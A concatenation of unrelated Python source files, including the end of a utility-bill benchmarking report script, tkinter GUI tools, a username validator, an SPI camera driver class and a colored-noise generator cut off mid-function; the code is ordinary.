# --- Monthly Cost Per MMBTU: Data and Graphs
# Exclude other charges from the natural gas costs. This is because the unit costs for natural gas go to infinity
# when there is zero usage but a customer charge
cost_df1 = df.drop(df[(df['service_type'] == 'natural_gas') & (df['units'] != 'CCF')].index)
# Create cost dataframe for given site from processed data
cost_df1 = cost_df1.query('site_id == @site')[['service_type', 'fiscal_year', 'fiscal_mo', 'cost']]
# Split out by service type
monthly_heating_cost = pd.pivot_table(cost_df1,
values='cost',
index=['fiscal_year', 'fiscal_mo'],
columns=['service_type'],
aggfunc=np.sum
)
# Add in columns for the missing energy services
missing_services = bu.missing_energy_services(monthly_heating_cost.columns)
bu.add_columns(monthly_heating_cost, missing_services)
monthly_heating_cost = monthly_heating_cost[bu.all_heat_services]
# Create a total heating column
monthly_heating_cost['total_heating_cost'] = monthly_heating_cost.sum(axis=1)
monthly_heating_cost = monthly_heating_cost.rename(columns=cost_col_dict)
monthly_heat_energy_and_use = pd.merge(monthly_heating_cost, monthly_heating, left_index=True, right_index=True, how='outer')
# Create unit cost columns in $ / MMBTU for each fuel type
for col in cost_cols:
n_col_name = col.split('_cost')[0] + "_unit_cost"
use_col_name = col.split('_cost')[0]
monthly_heat_energy_and_use[n_col_name] = monthly_heat_energy_and_use[col] / monthly_heat_energy_and_use[use_col_name]
monthly_heat_energy_and_use['building_unit_cost'] = monthly_heat_energy_and_use.total_heating_cost / monthly_heat_energy_and_use.total_heating_energy
# Reset the index for easier processing
monthly_heat_energy_and_use = monthly_heat_energy_and_use.reset_index()
# Add in unit costs for fuels that are currently blank
# Get only columns that exist in the dataframe
available_service_list = list(grouped_nonzero_heatfuel_use.columns.values)
heat_services_in_grouped_df = list(set(bu.all_heat_services) & set(available_service_list))
unit_cost_cols = [col + "_unit_cost" for col in heat_services_in_grouped_df]
service_types = [col + "_avg_unit_cost" for col in heat_services_in_grouped_df]
unit_cost_dict = dict(zip(unit_cost_cols,service_types))
# Add in average unit costs calculated from all sites for each month
monthly_heat_energy_and_use = pd.merge(monthly_heat_energy_and_use, grouped_nonzero_heatfuel_use,
left_on=['fiscal_year', 'fiscal_mo'], right_on=['fiscal_year', 'fiscal_mo'],
how='left', suffixes=('', '_avg_unit_cost'))
# Check each column to see if it is NaN (identified when the value does not equal itself) and if it is, fill with the average
# price per MMBTU taken from all sites
for col, service in unit_cost_dict.items():
monthly_heat_energy_and_use[col] = np.where(monthly_heat_energy_and_use[col] != monthly_heat_energy_and_use[col],
monthly_heat_energy_and_use[service],
monthly_heat_energy_and_use[col])
# Add calendar year and month columns
cal_year = []
cal_mo = []
for fiscal_year, fiscal_mo in zip(monthly_heat_energy_and_use.fiscal_year, monthly_heat_energy_and_use.fiscal_mo):
CalYear, CalMo = bu.fiscal_to_calendar(fiscal_year, fiscal_mo)
cal_year.append(CalYear)
cal_mo.append(CalMo)
monthly_heat_energy_and_use['calendar_year'] = cal_year
monthly_heat_energy_and_use['calendar_mo'] = cal_mo
# Create a date column using the calendar year and month to pass to the graphing function
def get_date(row):
return datetime.date(year=row['calendar_year'], month=row['calendar_mo'], day=1)
monthly_heat_energy_and_use['date'] = monthly_heat_energy_and_use[['calendar_year','calendar_mo']].apply(get_date, axis=1)
p9g1_filename, p9g1_url = gu.graph_filename_url(site, "heating_cost_g1")
gu.fuel_price_comparison_graph(monthly_heat_energy_and_use, 'date', unit_cost_cols, 'building_unit_cost', p9g1_filename)
# --- Realized Savings from Fuel Switching: Page 9, Graph 2
# Create an indicator for whether a given heating fuel is available for the facility. This is done by checking the use for all
# months- if it is zero, then that building doesn't have the option to use that type of fuel.
for col in bu.all_heat_services:
new_col_name = col + "_available"
monthly_heat_energy_and_use[new_col_name] = np.where(monthly_heat_energy_and_use[col].sum() == 0, 0, 1)
# Calculate what it would have cost if the building used only one fuel type
available_cols = []
unit_cost_cols_2 = []
for col in bu.all_heat_services:
available_cols.append(col + "_available")
unit_cost_cols_2.append(col + "_unit_cost")
available_dict = dict(zip(unit_cost_cols_2, available_cols))
hypothetical_cost_cols = []
for unit_cost, avail_col in available_dict.items():
new_col_name = unit_cost + "_hypothetical"
hypothetical_cost_cols.append(new_col_name)
monthly_heat_energy_and_use[new_col_name] = monthly_heat_energy_and_use[unit_cost] * monthly_heat_energy_and_use.total_heating_energy * monthly_heat_energy_and_use[avail_col]
# Calculate the monthly savings to the building by not using the most expensive available fuel entirely
monthly_heat_energy_and_use['fuel_switching_savings'] = monthly_heat_energy_and_use[hypothetical_cost_cols].max(axis=1) - monthly_heat_energy_and_use.total_heating_cost
# Sort dataframe to calculate cumulative value
monthly_heat_energy_and_use = monthly_heat_energy_and_use.sort_values(by='date', ascending=True)
# Calculate cumulative value
monthly_heat_energy_and_use['cumulative_fuel_switching_savings'] = np.cumsum(monthly_heat_energy_and_use.fuel_switching_savings)
p9g2_filename, p9g2_url = gu.graph_filename_url(site, "heating_cost_g2")
gu.create_monthly_line_graph(monthly_heat_energy_and_use, 'date', 'cumulative_fuel_switching_savings',
'Cumulative Fuel Switching Savings Realized [$]', p9g2_filename)
# Convert df to dictionary
heating_cost_rows = bu.df_to_dictionaries(heating_cost_and_use)
# Add data and graphs to main dictionary
template_data['heating_cost_analysis'] = dict(
graphs=[p9g1_url, p9g2_url],
table={'rows': heating_cost_rows},
)
return template_data
# ---------------------- Water Analysis Table ---------------------------
def water_report(site, df):
water_use = df.query('site_id == @site')[['service_type', 'fiscal_year', 'fiscal_mo','cost', 'usage', 'units']]
# Abort if no data
if water_use.empty:
return {}
# Create month count field for all months that have water and sewer bills
water_use_only = water_use.query("service_type == 'water'")
water_months_present = bu.months_present(water_use_only)
water_mo_count = bu.month_count(water_months_present)
# Create annual water gallon usage dataframe
water_gal_df = pd.pivot_table(water_use,
values='usage',
index=['fiscal_year',],
columns=['service_type'],
aggfunc=np.sum
)
# Add in columns for the missing services
gal_missing_services = bu.missing_services(water_gal_df.columns)
bu.add_columns(water_gal_df, gal_missing_services)
# Use only required columns
water_gal_df = water_gal_df[['water']]
# Calculate percent change column
water_gal_df['water_use_pct_change'] = water_gal_df.water.pct_change()
# Create annual water and sewer cost dataframe
water_cost_df = pd.pivot_table(water_use,
values='cost',
index=['fiscal_year',],
columns=['service_type'],
aggfunc=np.sum
)
# Add in columns for the missing services
water_missing_services = bu.missing_services(water_cost_df.columns)
bu.add_columns(water_cost_df, water_missing_services)
# Calculate totals, percent change
cols_to_remove = bu.all_energy_services + ['refuse']
water_cost_df = water_cost_df[water_cost_df.columns.difference(cols_to_remove)]
rename_dict = {'sewer': 'Sewer Cost',
'water': 'Water Cost'}
water_cost_df = water_cost_df.rename(columns=rename_dict)
# First check to make sure sewer data is included; if so, calculate total cost
water_cost_df['total_water_sewer_cost'] = water_cost_df.sum(axis=1)
water_cost_df['water_cost_pct_change'] = water_cost_df['Water Cost'].pct_change()
water_cost_df['sewer_cost_pct_change'] = water_cost_df['Sewer Cost'].pct_change()
water_cost_df['total_water_sewer_cost_pct_change'] = water_cost_df.total_water_sewer_cost.pct_change()
# Merge use and cost dataframes
water_use_and_cost = pd.merge(water_cost_df, water_gal_df, left_index=True, right_index=True, how='left')
water_use_and_cost['water_unit_cost'] = water_use_and_cost.total_water_sewer_cost / water_use_and_cost.water
water_use_and_cost['water_unit_cost_pct_change'] = water_use_and_cost.water_unit_cost.pct_change()
# Use only complete years
water_use_and_cost['month_count'] = water_mo_count
if len(water_use_and_cost):
water_use_and_cost = water_use_and_cost.query("month_count == 12")
water_use_and_cost = water_use_and_cost.drop('month_count', axis=1)
water_use_and_cost = water_use_and_cost.sort_index(ascending=False)
water_use_and_cost = water_use_and_cost.rename(columns={'Sewer Cost':'sewer_cost',
'Water Cost':'water_cost',
'total_water_sewer_cost':'total_cost',
'total_water_sewer_cost_pct_change':'total_cost_pct_change',
'water':'total_usage',
'water_use_pct_change':'total_usage_pct_change',
'water_unit_cost':'total_unit_cost',
'water_unit_cost_pct_change':'total_unit_cost_pct_change'
})
# ---- Create Water Cost Stacked Bar Graph - Page 10 Graph 1
p10g1_filename, p10g1_url = gu.graph_filename_url(site, "water_analysis_g1")
gu.create_stacked_bar(water_use_and_cost.reset_index(), 'fiscal_year', ['sewer_cost', 'water_cost'],
'Utility Cost [$]', "Annual Water and Sewer Costs", p10g1_filename)
# ---- Create Monthly Water Profile Graph
# Create monthly water gallon dataframe
water_gal_df_monthly = pd.pivot_table(water_use,
values='usage',
index=['fiscal_year', 'fiscal_mo'],
columns=['service_type'],
aggfunc=np.sum
)
p10g2_filename, p10g2_url = gu.graph_filename_url(site, "water_analysis_g2")
if 'water' in list(water_gal_df_monthly.columns.values):
gu.create_monthly_profile(water_gal_df_monthly, 'water', 'Monthly Water Usage Profile [gallons]', 'green',
"Monthly Water Usage Profile by Fiscal Year", p10g2_filename)
else:
shutil.copyfile(os.path.abspath('no_data_available.png'), os.path.abspath(p10g2_filename))
# Convert df to dictionary
water_rows = bu.df_to_dictionaries(water_use_and_cost)
# Return data and graphs in a dictionary
return dict(
water_analysis = dict(
graphs=[p10g1_url, p10g2_url],
table={'rows': water_rows}
)
)
#******************************************************************************
#******************************************************************************
# ----------------------------- Misc Functions --------------------------------
# Time when the script started running. Used to determine cumulative time
start_time = None
def msg(the_message):
"""Prints a message to the console, along cumulative elapsed time
since the script started.
"""
print('{} ({:.1f} s)'.format(the_message, time.time() - start_time))
#*****************************************************************************
#*****************************************************************************
# ----------------------------- Main Script -----------------------------------
if __name__=="__main__":
# Save the time when the script started, so cumulative times can be
# shown in messages printed to the console.
start_time = time.time()
msg('Benchmarking Script starting!')
# Get a Date/Time String for labeling this report
report_date_time = datetime.datetime.now().strftime('%B %d, %Y %I:%M %p')
# Read and Preprocess the data in the Utility Bill file, acquiring
# a DataFrame of preprocessed data and a utility function object that is
# needed by the analysis routines.
if settings.USE_DATA_FROM_LAST_RUN:
# Read the data from the pickle files that were created during the
# last run of the script.
df = pickle.load(open('df_processed.pkl', 'rb'))
util_obj = pickle.load(open('util_obj.pkl', 'rb'))
msg('Data from Last Run has been loaded.')
else:
# Run the full reading and processing routine
df_raw, df, util_obj = preprocess_data()
# Pickle the DataFrames and utility object for fast
# loading later, if needed
df_raw.to_pickle('df_raw.pkl')
df.to_pickle('df_processed.pkl')
pickle.dump(util_obj, open('util_obj.pkl', 'wb'))
# We no longer need the raw DataFrame, so delete it to
# save memory
del df_raw
# Clean out the output directories to prepare for the new report files
out_dirs = [
'output/debug',
'output/extra_data',
'output/images',
'output/sites'
]
for out_dir in out_dirs:
for fn in glob.glob(os.path.join(out_dir, '*')):
if not 'placeholder' in fn: # don't delete placeholder file
os.remove(fn)
# Create Index (Home) page
site_cats = util_obj.site_categories_and_buildings()
template_data = dict(
date_updated = report_date_time,
categories = site_cats
)
ix_template = template_util.get_template('index.html')
result = ix_template.render(template_data)
open('output/index.html', 'w').write(result)
# ------ Loop through the sites, creating a report for each
# Get the template used to create the site benchmarking report.
site_template = template_util.get_template('sites/index.html')
site_count = 0 # tracks number of site processed
for site_id in util_obj.all_sites():
# This line shortens the calculation process to start with whatever
# Site ID you want to start with
# if site_id < '1187': continue
msg("Site '{}' is being processed...".format(site_id))
# Gather template data from each of the report sections. The functions
# return a dictionary with variables needed by the template. Sometimes other
# values are returned from the function, often for use in later reports.
template_data = building_info_report(site_id, util_obj, report_date_time)
report_data = energy_index_report(site_id, df, util_obj)
template_data.update(report_data)
report_data, df_utility_cost = utility_cost_report(site_id, df, util_obj)
template_data.update(report_data)
# Filter down to just this site's bills and only services that
# are energy services in order to determine whether there are any
# energy services. Only do energy reports if there are some energy
# services
energy_services = bu.missing_energy_services([])
df1 = df.query('site_id==@site_id and service_type==@energy_services')
if not df1.empty:
report_data, df_usage = energy_use_cost_reports(site_id, df, util_obj, df_utility_cost)
template_data.update(report_data)
report_data = electrical_usage_and_cost_reports(site_id, df)
template_data.update(report_data)
#df_utility_cost.to_pickle('df_utility_cost.pkl')
#df_usage.to_pickle('df_usage.pkl')
#import sys; sys.exit()
report_data = heating_usage_cost_reports(site_id, df, util_obj, df_utility_cost, df_usage)
template_data.update(report_data)
report_data = water_report(site_id, df)
template_data.update(report_data)
# save template data variables to debug file if requested
if settings.WRITE_DEBUG_DATA:
with open('output/debug/{}.vars'.format(site_id), 'w') as fout:
pprint.pprint(template_data, fout)
# create report file
result = site_template.render(template_data)
with open('output/sites/{}.html'.format(site_id), 'w') as fout:
fout.write(result)
site_count += 1
if site_count == settings.MAX_NUMBER_SITES_TO_RUN:
break
print()
msg('Benchmarking Script Complete!')
|
def example(Simulator):
from csdl import Model
import csdl
import numpy as np
class ExampleSimple(Model):
def define(self):
x = self.declare_variable('x')
y = self.declare_variable('y')
a = x + y
b = x + y
c = 2 * a
d = 2 * b
self.register_output('c', c)
self.register_output('d', d)
sim = Simulator(ExampleSimple())
sim.run()
print('vec1', sim['vec1'].shape)
print(sim['vec1'])
print('vec2', sim['vec2'].shape)
print(sim['vec2'])
print('VecVecCross', sim['VecVecCross'].shape)
print(sim['VecVecCross'])
return sim |
#!/usr/bin/env python
import tkinter as tk
import serial
#import serial.tools.list_ports
import os
from random import Random
from time import sleep
import threading
master_ser = serial.Serial("COM30",115200,timeout=1)
window = tk.Tk()
window.title('My Window')
window.geometry('500x300')
cmd = [0x00,0x00]
l = tk.Label(window, bg='green', fg='white', width=20, text='手环调试工具')
l.pack()
def print_selection(v):
l.config(text='you have selected ' + v)
print(v)
v_str = 'AT+TP+VAL=' + str(v) + '\r\n'
master_ser.write(v_str.encode("utf-8"))
def button_up():
master_ser.write(('AT+TP+UP\r\n').encode("utf-8"))
def button_down():
master_ser.write(('AT+TP+DOWN\r\n').encode("utf-8"))
def button_left():
master_ser.write(('AT+TP+LEFT\r\n').encode("utf-8"))
def button_right():
master_ser.write(('AT+TP+RIGHT\r\n').encode("utf-8"))
def button_fun_1():
master_ser.write(('AT+TP+F1\r\n').encode("utf-8"))
def button_fun_2():
master_ser.write(('AT+TP+F2\r\n').encode("utf-8"))
def button_fun_3():
master_ser.write(('AT+TP+F3\r\n').encode("utf-8"))
s = tk.Scale(window, label='try me', from_=0, to=390, orient=tk.HORIZONTAL, length=400, showvalue=0,tickinterval=40, resolution=1, command=print_selection)
s.pack()
b_0 = tk.Button(window, text = "上键", command = button_up)
b_0.place(x = 100, y = 100, width=40, height=25)
#b_0.pack()
b_1 = tk.Button(window, text = "下键", command = button_down)
b_1.place(x = 100, y = 200, width=40, height=25)
b_2 = tk.Button(window, text = "左键", command = button_left)
b_2.place(x = 180, y = 150, width=40, height=25)
b_3 = tk.Button(window, text = "右键", command = button_right)
b_3.place(x = 20, y = 150, width=40, height=25)
b_3 = tk.Button(window, text = "功能一", command = button_fun_1)
b_3.place(x = 400, y = 100, width=40, height=25)
b_3 = tk.Button(window, text = "功能二", command = button_fun_2)
b_3.place(x = 400, y = 150, width=40, height=25)
b_3 = tk.Button(window, text = "功能三", command = button_fun_3)
b_3.place(x = 400, y = 200, width=40, height=25)
#b_1.pack()
def mouse_press(event):
print('鼠标按下')
master_ser.write(('AT+TP+P\r\n').encode("utf-8"))
def mouse_release(event):
print('鼠标抬起')
master_ser.write(('AT+TP+Rel\r\n').encode("utf-8"))
s.bind('<ButtonPress-1>',mouse_press)
s.bind('<ButtonRelease-1>',mouse_release)
window.mainloop()
master_ser.close()
print("测试程序结束!")
|
import tkinter
import tkinter.tix
from scripts import Warnings, Constants
from scripts.frontend.custom_widgets import CustomLabels
from scripts.frontend.custom_widgets.WidgetInterface import WidgetInterface
class Frame(tkinter.Frame, WidgetInterface):
_selected = "Number of Selected Items: "
def __init__(self, root, multi_select=False, select_change_command=None):
tkinter.Frame.__init__(self, root)
self.grid(padx=Constants.STANDARD_SPACING, pady=Constants.STANDARD_SPACING)
self.grid(sticky=tkinter.NSEW)
# Selection logic
self.selected_index_listbox = -1
self.selected_index_sorted_listbox = -1
self.select_change_command = select_change_command
# Configures weights
self.rowconfigure(0, weight=1)
self.columnconfigure(0, weight=0)
self.columnconfigure(1, weight=0)
self.columnconfigure(2, weight=1)
self.columnconfigure(3, weight=0)
# Creates the scroll bar
self.scrollbar = tkinter.Scrollbar(self, orient=tkinter.VERTICAL)
self.scrollbar.grid(column=3, row=0)
self.scrollbar.grid(columnspan=1, rowspan=1)
self.scrollbar.grid(padx=Constants.SHORT_SPACING, pady=Constants.SHORT_SPACING)
self.scrollbar.grid(sticky=tkinter.NS)
# Initializes the list box
self.listbox = tkinter.Listbox(self, selectmode=tkinter.SINGLE,
yscrollcommand=self.listbox_scroll, exportselection=False)
self.listbox.grid(column=2, row=0)
self.listbox.grid(columnspan=1, rowspan=1)
self.listbox.grid(padx=Constants.SHORT_SPACING, pady=Constants.SHORT_SPACING)
self.listbox.grid(sticky=tkinter.NSEW)
# Initializes the listbox that displays the sorted data values
self.sorted_listbox = tkinter.Listbox(self, selectmode=tkinter.SINGLE, width=3,
yscrollcommand=self.sorted_listbox_scroll, exportselection=True)
self.sorted_listbox.grid(column=1, row=0)
self.sorted_listbox.grid(columnspan=1, rowspan=1)
self.sorted_listbox.grid(padx=Constants.SHORT_SPACING, pady=Constants.SHORT_SPACING)
self.sorted_listbox.grid(sticky=tkinter.NS)
# Creates selectable scroll bar
self.multi_select = multi_select
self.selectbox = None
if multi_select is True:
self.selectbox = tkinter.Listbox(
self, width=2, exportselection=False,
selectmode=tkinter.MULTIPLE, yscrollcommand=self.selectbox_scroll)
self.selectbox.grid(column=0, row=0)
self.selectbox.grid(columnspan=1, rowspan=1)
self.selectbox.grid(padx=Constants.SHORT_SPACING, pady=Constants.SHORT_SPACING)
self.selectbox.grid(sticky=tkinter.NS)
# Links the scrollbar to the listbox (so you can move listbox view with the scrollbar)
self.scrollbar.config(command=self.listbox.yview)
if multi_select is True:
self.scrollbar.config(command=self.scroll)
# Selected count
self.selected_count_label = self.selected_count_label = CustomLabels.SearchLabel(
self,
column=0, row=2,
columnspan=3,
text=Frame._selected + str(self.num_selected()))
self.selected_count_label.grid_remove()
def update_colour(self):
super().update_colour()
self.selected_count_label.update_colour()
def update_content(self):
super().update_content()
# Selection Activation
selection_changed = False
if self.listbox.size() > 0: # TODO, add a function that will trigger upon select change
if len(self.listbox.curselection()) > 0 and self.selected_index_listbox != self.listbox.curselection()[0]:
self.selected_index_listbox = self.listbox.curselection()[0]
self.sorted_listbox.selection_clear(0, tkinter.END)
self.sorted_listbox.selection_set(self.selected_index_listbox)
self.selected_index_sorted_listbox = self.selected_index_listbox
selection_changed = True
elif len(self.sorted_listbox.curselection()) > 0 and \
self.selected_index_sorted_listbox != self.sorted_listbox.curselection()[0]:
self.selected_index_sorted_listbox = self.sorted_listbox.curselection()[0]
self.listbox.selection_clear(0, tkinter.END)
self.listbox.selection_set(self.selected_index_sorted_listbox)
self.selected_index_listbox = self.selected_index_sorted_listbox
selection_changed = True
if (selection_changed is True) and (self.select_change_command is not None):
self.select_change_command()
# Selected Count
if self.num_selected() != 0:
self.selected_count_label.config(text=Frame._selected + str(self.num_selected()))
self.selected_count_label.grid()
else:
self.selected_count_label.grid_remove()
# Synchronous scrolling of both list boxes
def scroll(self, *args):
self.listbox.yview(*args)
self.selectbox.yview(*args)
def listbox_scroll(self, *args):
if (self.selectbox is not None) and (self.listbox.yview() != self.selectbox.yview()):
self.selectbox.yview_moveto(args[0])
if self.listbox.yview() != self.sorted_listbox.yview():
self.sorted_listbox.yview_moveto(args[0])
self.scrollbar.set(*args)
def sorted_listbox_scroll(self, *args):
if (self.selectbox is not None) and (self.sorted_listbox.yview() != self.selectbox.yview()):
self.selectbox.yview_moveto(args[0])
if self.sorted_listbox.yview() != self.listbox.yview():
self.listbox.yview_moveto(args[0])
self.scrollbar.set(*args)
def selectbox_scroll(self, *args):
if self.selectbox.yview() != self.listbox.yview():
self.listbox.yview_moveto(args[0])
if self.selectbox.yview() != self.sorted_listbox.yview():
self.sorted_listbox.yview_moveto(args[0])
self.scrollbar.set(*args)
# More functionality methods
def get_selected_multi(self):
if self.multi_select is True:
return self.selectbox.curselection()
else:
return ()
def get_selected_main(self):
if self.is_selected_main():
return self.listbox.curselection()[0]
else:
return None
def is_selected_main(self):
return len(self.listbox.curselection()) > 0
def unselect_main(self):
# Clears the selection
self.listbox.selection_clear(0, tkinter.END)
self.sorted_listbox.selection_clear(0, tkinter.END)
# Resets select index
self.selected_index_listbox = -1
self.selected_index_sorted_listbox = -1
def num_selected(self):
return len(self.get_selected_multi())
def add_to_list(self, item_display_name, item_display_sorted, index=tkinter.END):
# Computes the index
if index == tkinter.END:
index = self.listbox.size()
# Adds the item to the index
self.listbox.insert(index, item_display_name)
self.sorted_listbox.insert(index, str(item_display_sorted))
if self.selectbox is not None:
selectbox_text = " " + str(index)
self.selectbox.insert(index, selectbox_text)
self.selectbox.config(width=len(selectbox_text))
return True
def remove_from_list(self, item_display_name):
# Find the index of the item
found = False
index = 0
for index in range(0, self.listbox.size()):
if self.listbox.index(index) == item_display_name:
found = True
break
# Removes the item
if found is True:
# Removes the item at index
self.listbox.delete(index)
self.replace_list(self.listbox.get(0, tkinter.END))
return True
else:
Warnings.not_to_reach()
return False
def replace_list(self, new_list, new_sorted_list):
assert len(new_list) == len(new_sorted_list)
# Sets the appropriate width of the sorted column
max_width = 1
for item in new_sorted_list:
if len(str(item)) > max_width:
max_width = len(item)
self.sorted_listbox.config(width=max_width)
# Removes all items
self.listbox.delete(0, tkinter.END)
self.sorted_listbox.delete(0, tkinter.END)
if self.multi_select is True:
self.selectbox.delete(0, tkinter.END)
# Deletes and re-adds the items
for index in range(0, len(new_list)):
self.add_to_list(new_list[index], new_sorted_list[index])
# Resets select index
self.selected_index_listbox = -1
self.selected_index_sorted_listbox = -1
return True
|
import string
import random
import sys
args = sys.argv
N = int(args[1])
M = int(args[2])
saida = args[3]
pontos = []
letras = string.hexdigits
for i in range(N):
ponto = []
ponto.append("".join(random.choice(letras) for i in range(random.randint(1, 31))))
tem_repetido = True
while tem_repetido:
tem_repetido = False
coordenadas = []
for i in range(M):
coordenadas.append(random.random() * 10)
for i, ponto_obs in enumerate(pontos):
if i == 0:
continue
iguais = 0
for coord in coordenadas:
tem_igual = all(elemento == coord for elemento in ponto_obs)
if tem_igual:
iguais += 1
if iguais == len(coordenadas):
tem_repetido = True
if tem_repetido:
continue
else:
break
ponto.append(coordenadas)
pontos.append(ponto)
f = open(saida, "w")
for ponto in pontos:
f.write(ponto[0])
for coord in ponto[1]:
f.write(",")
f.write(str(coord))
f.write("\n")
# printing punctuation
|
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2015-2018 CERN.
#
# Invenio is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Validators for user profiles."""
from __future__ import absolute_import, print_function
import re
from flask_babelex import lazy_gettext as _
username_regex = re.compile('^[a-zA-Z][a-zA-Z0-9-_]{2}[a-zA-Z0-9-_]*$')
"""Username rules."""
USERNAME_RULES = _(
'Username must start with a letter, be at least three characters long and'
' only contain alphanumeric characters, dashes and underscores.')
"""Description of username validation rules.
.. note:: Used for both form help text and for form validation error."""
def validate_username(username):
"""Validate the username.
See :data:`~.username_regex` to know which rules are applied.
:param username: A username.
:raises ValueError: If validation fails.
"""
if not username_regex.match(username):
raise ValueError(USERNAME_RULES)
|
# x_6_4
#
# セリーグの対戦カードの組み合わせを「巨人 x 阪神」のように表示してください(ただし同一チーム同志は対戦しないこと)
central_league = ['巨人', 'ヤクルト', '横浜', '中日', '阪神', '広島']
|
#MIT License
#Copyright (c) 2021 Jonatan Asensio Palao
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is
#furnished to do so, subject to the following conditions:
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
#SOFTWARE.
from pyb import Pin
import sensor
class CameraSlave():
control = None
rx_image_width = 320
rx_image_height = 240
spi = None
rx_buff = None
tx_buff = None
def __init__(self, spi, width, height, alloc_tx_buff=False, alloc_rx_buff=False, pin_data_ready=None, sync_cancel_condition=None):
self.spi = spi
if alloc_tx_buff:
self.tx_buff = sensor.alloc_extra_fb(width, height, sensor.RGB565)
if alloc_rx_buff:
self.rx_buff = sensor.alloc_extra_fb(width, height, sensor.RGB565)
self.pin_data_ready = Pin(pin_data_ready, Pin.IN)
if not sync_cancel_condition:
self.sync_cancel_condition = lambda: False
else:
self.sync_cancel_condition = sync_cancel_condition
self.control = CameraSlaveControl()
def sync(self, ignore_busy=False):
if not ignore_busy:
while self.pin_data_ready and self.pin_data_ready.value() == 1:
if self.sync_cancel_condition():
return False
if self.tx_buff is not None and self.rx_buff is not None:
self.spi.send_recv(self.tx_buff.bytearray(), self.rx_buff.bytearray())
elif self.tx_buff is not None:
self.spi.send(self.tx_buff.bytearray())
elif self.rx_buff is not None:
self.spi.recv(self.rx_buff.bytearray())
self.spi.send(self.control.buff)
return True
def increase_column_offset(self):
self.control.column_offset += 1
def decrease_column_offset(self):
self.control.column_offset -= 1
def increase_row_offset(self):
self.control.row_offset += 1
def decrease_row_offset(self):
self.control.row_offset -= 1
def increase_column_factor(self):
self.control.column_zoom_numerator += 1
self.control.column_zoom_denominator = 20
def decrease_column_factor(self):
self.control.column_zoom_numerator -= 1
self.control.column_zoom_denominator = 20
def increase_row_factor(self):
self.control.row_zoom_numerator += 1
self.control.row_zoom_denominator = 20
def decrease_row_factor(self):
self.control.row_zoom_numerator -= 1
self.control.row_zoom_denominator = 20
class CameraSlaveControl():
COLUMN_OFFSET = const(0)
ROW_OFFSET = const(1)
COLUMN_ZOOM_NUMERATOR = const(2)
COLUMN_ZOOM_DENOMINATOR = const(3)
ROW_ZOOM_NUMERATOR = const(4)
ROW_ZOOM_DENOMINATOR = const(5)
def __init__(self):
self.buff = bytearray(6)
@property
def column_offset(self):
return self.buff[COLUMN_OFFSET]
@column_offset.setter
def column_offset(self, column_offset):
self.buff[COLUMN_OFFSET] = column_offset
@property
def row_offset(self):
return self.buff[ROW_OFFSET]
@row_offset.setter
def row_offset(self, row_offset):
self.buff[ROW_OFFSET] = row_offset
@property
def column_zoom_numerator(self):
return self.buff[COLUMN_ZOOM_NUMERATOR]
@column_zoom_numerator.setter
def column_zoom_numerator(self, column_zoom_numerator):
self.buff[COLUMN_ZOOM_NUMERATOR] = column_zoom_numerator
@property
def column_zoom_denominator(self):
return self.buff[COLUMN_ZOOM_DENOMINATOR]
@column_zoom_denominator.setter
def column_zoom_denominator(self, column_zoom_denominator):
self.buff[COLUMN_ZOOM_DENOMINATOR] = column_zoom_denominator
@property
def row_zoom_numerator(self):
return self.buff[ROW_ZOOM_NUMERATOR]
@row_zoom_numerator.setter
def row_zoom_numerator(self, row_zoom_numerator):
self.buff[ROW_ZOOM_NUMERATOR] = row_zoom_numerator
@property
def row_zoom_denominator(self):
return self.buff[ROW_ZOOM_DENOMINATOR]
@row_zoom_denominator.setter
def row_zoom_denominator(self, row_zoom_denominator):
self.buff[ROW_ZOOM_DENOMINATOR] = row_zoom_denominator
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Aug 3 16:27:19 2018
@author: binggu
"""
import numpy as np
#! program to illustrate the colored Gaussian Noise generator CGAUSS
#! The routine must be initialized with CGAUS0 and calls a flat distribution
#! random number generator available with most compilers or you can write your
#! own. Here we used the routine RAN1 from Numerical Recipes 2nd Edition, by
#! Press, Teukolsky, Vetterling, and Flannery.
#!
#! It now uses the F90 intrinsic subroutine RANDOM_NUMBER.
#!
#! The White Guassian noise generator GASDEV from Numerical Recipes was
#! adapted to produce Colored Gaussian noise. The basic equations for this
#! computation are presented in the article by
#! Fox et al., Physical Review A vol.38(1988) page 5938.
#! This code was [originally] compiled and tested with Microsoft Powerstation.
#
#! It was modified by Walt Brainerd to be standard Fortran and
#! compiled on NAGWare F90.
def corr(eps):
"""
calculate the autocorrelation function in variable MEAN.
"""
f = open('corr.out')
cor = np.zeros(nstep)
npts = nstep * nsample
for idly in range(nstep):
mean = 0.0
std = 0.
for i in range(nsample):# i=1,nreal
for j in range(nstep - idly):
mean += eps[j,i] * eps[j+idly, i]
cor[idly] = mean/float(npts)
#smean=sngl(mean) #single precision speeds up calculations
f.close()
return cor
def cnoise(nstep, nsample, dt=0.001, tau=0.0025, ave=0., D=0.0025, ):
"""
store several series of Gaussian noise values in array EPS.
This is based on the algorithm in R. F. Fox et al. Phys. Rev. A 38, 11 (1988).
The generated noise satisfy <eps(t) eps(s)> = D/tau * exp(-|t-s|/tau), and
the initial distribution is Gaussian N(0, sigma) with sigma**2 = D/tau
INPUT:
dt: timestep, default 0.001
tau: correlation time, default 0.0025
ave: average value, default 0.0
D: strength of the noise, default 0.0025
OUTPUT:
eps: eps[nstep, nsample] colored Gaussian noise
"""
sigma = np.sqrt(D/tau) # variance
# initialize
eps = np.zeros((nstep, nsample))
eps[0,:] = np.random.rand(nsample) * sigma
E = np.exp(-dt/tau)
for j in range(nsample):
for i in range(nstep-1):
a = np.random.rand()
